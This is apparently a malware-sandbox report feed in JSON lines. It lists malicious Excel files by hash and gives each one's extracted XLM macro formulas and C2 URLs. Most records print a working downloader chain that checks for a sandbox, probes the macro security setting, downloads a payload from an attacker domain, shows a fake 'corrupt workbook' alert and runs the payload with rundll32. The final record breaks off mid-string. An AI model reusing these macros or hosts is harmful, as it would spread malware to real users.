{"version":"0.2","sample":{"sample":"","kind":"file","target":"269f271be9279f95977e14c549a2768de0350efc09c2b4b870d99e560400d2ea"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"269f271be9279f95977e14c549a2768de0350efc09c2b4b870d99e560400d2ea","filesize":206336,"md5":"5debd639e471da81f734e7ab9406b312","sha1":"37aab13248f282ef9b52aec8dede27aa99b0fd0f","sha256":"269f271be9279f95977e14c549a2768de0350efc09c2b4b870d99e560400d2ea","sha512":"60e1c9c97ef56919e811d1ca13c64e2c183507847a3e6f176d08f0d244514cd10c6d9dec3f26be095d4a98504930db5d2eb3caf87e68f1d4a221cdb2e1ccabbf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"269f271be9279f95977e14c549a2768de0350efc09c2b4b870d99e560400d2ea.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gFsHqlvvQa\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"26a8dd5429741504ead65a95fa70e95f772f838f7c2751d86dbcbafdad21fe60"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"26a8dd5429741504ead65a95fa70e95f772f838f7c2751d86dbcbafdad21fe60","filesize":167424,"md5":"7d8e940fc942f664523abebc8999d9da","sha1":"a4dff96abaa472d631f4700e0dd7f309d7dec1d9","sha256":"26a8dd5429741504ead65a95fa70e95f772f838f7c2751d86dbcbafdad21fe60","sha512":"87085f1ecff842b4538dc0842398c4e23607f916beac7a150a69685e25b111a1eb81b568be93c9ac1a9deb9ccbd053f2a69a3cbe30e88c645e9d2f096909168a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"26a8dd5429741504ead65a95fa70e95f772f838f7c2751d86dbcbafdad21fe60.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"UOFNm0mopw\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"26ac41acf8f32ab0907f2753fe6e21971b0a2ea9a4a99b8b63fa9e325ef8cf98"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"26ac41acf8f32ab0907f2753fe6e21971b0a2ea9a4a99b8b63fa9e325ef8cf98","filesize":113664,"md5":"240d3f855032929f3d778f5d018ca96f","sha1":"d9b158251f09944429c9009623d30baf7fbcefa7","sha256":"26ac41acf8f32ab0907f2753fe6e21971b0a2ea9a4a99b8b63fa9e325ef8cf98","sha512":"01672f04b014773f1cf95b9702c4c695af36390e76c04a5bdefd4dc0df08910a7202533ebacec65a2a9ee7f96f6ebaab65f6c91424c14fc92abbaaba92d01b3a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"26ac41acf8f32ab0907f2753fe6e21971b0a2ea9a4a99b8b63fa9e325ef8cf98.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gGNSTwCSnB\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"26bb8b300198a6bdb2ca091775abafeb28dd36063d93f7e38faa01cb101842df"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"26bb8b300198a6bdb2ca091775abafeb28dd36063d93f7e38faa01cb101842df","filesize":225280,"md5":"8a41e7c243c84307770fbed2478e1bdf","sha1":"bfc3e20bc0d499ce29a966efc7cf834ec288f76c","sha256":"26bb8b300198a6bdb2ca091775abafeb28dd36063d93f7e38faa01cb101842df","sha512":"d4c55f15be4e4ae8b10e52139345df74c1b7d64d83781553d963678e1bfed0fe90216780432b23cf41578681ff3646a141598af0c9cc59891d84df7f40230e7c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"26bb8b300198a6bdb2ca091775abafeb28dd36063d93f7e38faa01cb101842df.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2fGNr20H1b\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"26be9da0f1c468d6928758b6404acfb276c5cda5ae3ff5efe62d8722ffe6895d"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"26be9da0f1c468d6928758b6404acfb276c5cda5ae3ff5efe62d8722ffe6895d","filesize":112128,"md5":"43fda233d18a24b2d0e81c884b59d3b7","sha1":"254ff3b1a18d265aa7604e90245b2d3ab557b14f","sha256":"26be9da0f1c468d6928758b6404acfb276c5cda5ae3ff5efe62d8722ffe6895d","sha512":"f382ec3ac40bbdae044fb667e0eb8897d4233b5b6c5cfd5f348bf0bb5a9a8bb8714a38666f9e273df5b5c19555cb4dd231492c75ae1da286a6d7d882a9e43867","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"26be9da0f1c468d6928758b6404acfb276c5cda5ae3ff5efe62d8722ffe6895d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"26cf6040829a2ed37d23915962766dd0ca065690dbcd4e956cd94fa3e4f6c88f"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"26cf6040829a2ed37d23915962766dd0ca065690dbcd4e956cd94fa3e4f6c88f","filesize":113664,"md5":"1636d11d81a8932201a7880cc5583946","sha1":"82b778d38c47ac3faa6e7e1045ec19c14ad8effd","sha256":"26cf6040829a2ed37d23915962766dd0ca065690dbcd4e956cd94fa3e4f6c88f","sha512":"d23bf3d79b5d45bf39253b637bd81c24f87cd15ffe6be0dfc67125b9426dcdec7a26b852418a822497b981e5b9027e7378ff5d20687fbf4632275867834c151d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"26cf6040829a2ed37d23915962766dd0ca065690dbcd4e956cd94fa3e4f6c88f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VAE997976P\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"270b2d510f7635c2b98cfd3c619717f20bf3bafca0659054081bcfe670f70cb8"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"270b2d510f7635c2b98cfd3c619717f20bf3bafca0659054081bcfe670f70cb8","filesize":112640,"md5":"bb8256a61fae599ab7c8048014d2a8ba","sha1":"fcba92a89eeb9121e0490d8a67ce56f6a1f193f9","sha256":"270b2d510f7635c2b98cfd3c619717f20bf3bafca0659054081bcfe670f70cb8","sha512":"5a8b01901fb9349fa515dcd9b1a9bfc4c97479abc88657dd405f5b02d122529459b1be3a854d5b65693ea2da89a521476b13fff435dc2f35530bf1ebc667f8cd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"270b2d510f7635c2b98cfd3c619717f20bf3bafca0659054081bcfe670f70cb8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"27234447afe67a2f9a1b8a96e7c270cf1fa4da720216811d08dfb10ddd4cebb4"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"27234447afe67a2f9a1b8a96e7c270cf1fa4da720216811d08dfb10ddd4cebb4","filesize":209920,"md5":"cf9bcda67aaf5c13a9d2cd44a5d993ca","sha1":"c325045f8b587d237df017f2e638d157fd5df76c","sha256":"27234447afe67a2f9a1b8a96e7c270cf1fa4da720216811d08dfb10ddd4cebb4","sha512":"67e0abdef3cd95c64b2968b53b9dc808d868f9674d92bb3a5a0a9d9d335d97cde7b54fce44fcee8001e2b451e10bd8d1e6cdab640db2d72012ae2994be5f1fc0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"27234447afe67a2f9a1b8a96e7c270cf1fa4da720216811d08dfb10ddd4cebb4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LPrhVYbh6w\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"27394dd94995ad4719acbb6e4cf263e54e1d93c59984e7f144a4ff795c7bbf2f"},"analysis":{"reported":"2020-04-09T16:15:26Z","score":10},"files":[{"filename":"27394dd94995ad4719acbb6e4cf263e54e1d93c59984e7f144a4ff795c7bbf2f","filesize":167936,"md5":"fdce1b708064066598e84b1b0d29d0d3","sha1":"d46e5f9a7080793ae8e85f124464d9181dd23a8f","sha256":"27394dd94995ad4719acbb6e4cf263e54e1d93c59984e7f144a4ff795c7bbf2f","sha512":"a4c87b9ff6b8c0b9f57b9fbcdb0cd5a5908e8a671a457ae5e5ebe5743e3fda1c7051ed91c3cbee60744ffb7f12c0f29138e7cf21a4ca504d9c9895cc52e2b7ce","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"27394dd94995ad4719acbb6e4cf263e54e1d93c59984e7f144a4ff795c7bbf2f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"r457wSEMdI\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2757acaf65a44d73d308279bdbba147e7e32d0f8b81041d4ddc486726d469ee8"},"analysis":{"reported":"2020-04-09T16:15:26Z","score":10},"files":[{"filename":"2757acaf65a44d73d308279bdbba147e7e32d0f8b81041d4ddc486726d469ee8","filesize":185344,"md5":"f8da90a80cf6fa31cdb4abd478e61067","sha1":"d9243b8472cb8d7ffa7e1c90fcc07b248b3f42d0","sha256":"2757acaf65a44d73d308279bdbba147e7e32d0f8b81041d4ddc486726d469ee8","sha512":"e2daee649f474120f53820b87c96ab1c795cb23284846d27d1dd9e2c587d9452b0ad2b6be0df74495e7bc98d39be0a49ad0a26b3e9b3aa9ce38ec923a5596818","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2757acaf65a44d73d308279bdbba147e7e32d0f8b81041d4ddc486726d469ee8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"27653d309eadbce72bec5332931e1894ea2394071a965fab19d18834bdf44e8f"},"analysis":{"reported":"2020-04-09T16:15:26Z","score":10},"files":[{"filename":"27653d309eadbce72bec5332931e1894ea2394071a965fab19d18834bdf44e8f","filesize":116224,"md5":"458b2be841cd0834289c105a91827867","sha1":"ce7dd6c5d428bef30f7bfb1e09beae9dbf441edd","sha256":"27653d309eadbce72bec5332931e1894ea2394071a965fab19d18834bdf44e8f","sha512":"a5687945b1209e2d593ac1c023e78730a69467ac5586247843f5e9c498d499091cca7a58bbc4d28661c6d10308bdcd71cccfee9b96b08e1333c8ba71ffc0ff22","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"27653d309eadbce72bec5332931e1894ea2394071a965fab19d18834bdf44e8f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"f1uCEqMjHT\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"27902cf66c5a12f84a5b4d7b4249dad9bef456ce8b8d809796bf91de6b985c6e"},"analysis":{"reported":"2020-04-09T16:15:26Z","score":10},"files":[{"filename":"27902cf66c5a12f84a5b4d7b4249dad9bef456ce8b8d809796bf91de6b985c6e","filesize":62976,"md5":"eba9e10a9ddeba513868f5dfce5f27ff","sha1":"b9caf3a3e07673fbff7c1b558745f8504a93ec9a","sha256":"27902cf66c5a12f84a5b4d7b4249dad9bef456ce8b8d809796bf91de6b985c6e","sha512":"3a8eef733bb59c4627b7e9cf92c7de7883c1c8e56d252490452e624bd653a767678780316ca179b75b395e53a719b9bb1fb1f45451eec3a9fab101870b0909c5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"27902cf66c5a12f84a5b4d7b4249dad9bef456ce8b8d809796bf91de6b985c6e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(\"???\",R$48C$9,R$21C$11,R$31C$9)\nSUM(R$31C$9,R$21C$11,R$48C$9)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2796eaf03b44f1eb5be3bdf1a832c8bf19188a37020a654695c83d547b3f5ae8"},"analysis":{"reported":"2020-04-09T16:15:26Z","score":10},"files":[{"filename":"2796eaf03b44f1eb5be3bdf1a832c8bf19188a37020a654695c83d547b3f5ae8","filesize":167936,"md5":"6b935c4328f21e12184a708343bc97c7","sha1":"3cbeaa783484680d98d7cec841606191f695b525","sha256":"2796eaf03b44f1eb5be3bdf1a832c8bf19188a37020a654695c83d547b3f5ae8","sha512":"51bc52a0075a2837a9ee4275de3ffeb34a910cb7547ad8f5d2ced9fa1b258bee4419425ab3c7e17daf76330810d10e5fd4bfa39d7e30a848f627ff28ebcb0064","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2796eaf03b44f1eb5be3bdf1a832c8bf19188a37020a654695c83d547b3f5ae8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vnEPDboya9\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"279dd70e704c7999ba14a5401d7f81be43fa94525b005a0a996dd6764a666a3c"},"analysis":{"reported":"2020-04-09T16:15:26Z","score":10},"files":[{"filename":"279dd70e704c7999ba14a5401d7f81be43fa94525b005a0a996dd6764a666a3c","filesize":177152,"md5":"55289b9e748b00f45b233e2c1559fd18","sha1":"51ebfadce1612a7ac4034507165094a2d4969c1a","sha256":"279dd70e704c7999ba14a5401d7f81be43fa94525b005a0a996dd6764a666a3c","sha512":"9016b60dff37bf34ea35564361749fc32bcc3a54f51b0a57542569fa0669ea1987595e3768f68a66cf10bb7073003f0abc872a47c488b8873ba96bab928b17ae","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"279dd70e704c7999ba14a5401d7f81be43fa94525b005a0a996dd6764a666a3c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CNNWaCBBGu\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"27bfa02fb614d4ef0fe7f0d1844b7c4ef520806b62103c42d0ae3cb47e7a6139"},"analysis":{"reported":"2020-04-09T16:15:26Z","score":10},"files":[{"filename":"27bfa02fb614d4ef0fe7f0d1844b7c4ef520806b62103c42d0ae3cb47e7a6139","filesize":167424,"md5":"33c3dfddd057944af3e84b883b284e2d","sha1":"def8dadcf101f1d98b2795489c774f902906904e","sha256":"27bfa02fb614d4ef0fe7f0d1844b7c4ef520806b62103c42d0ae3cb47e7a6139","sha512":"52a266b413b4cae24dd54f6c154bda0d14ef29e21adb7cf09c55d4b684994e5f289a23d9586be06243919fcfe6c30792ba2cb099efcf54fbabea93385cc1cc6f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"27bfa02fb614d4ef0fe7f0d1844b7c4ef520806b62103c42d0ae3cb47e7a6139.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"7qYNhzlPp9\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"27c9763c61b71e3df4c35a7ede451ab553a3e66f8f1fcf8e8d5603ad5d3018aa"},"analysis":{"reported":"2020-04-09T16:15:26Z","score":10},"files":[{"filename":"27c9763c61b71e3df4c35a7ede451ab553a3e66f8f1fcf8e8d5603ad5d3018aa","filesize":209920,"md5":"56cd4dac076623d0f3bf39116eb7a1dc","sha1":"8be7902209d9e6d62882bdd21efc208a89555baf","sha256":"27c9763c61b71e3df4c35a7ede451ab553a3e66f8f1fcf8e8d5603ad5d3018aa","sha512":"098179edcbbe04d68c62964d586b133de0e23ca9b1385b2e8d76e974abb81550e619d6e556709231b59b31c8838d7c494c485c3aa0f6a55ca1fa649c4d4eeeb7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"27c9763c61b71e3df4c35a7ede451ab553a3e66f8f1fcf8e8d5603ad5d3018aa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 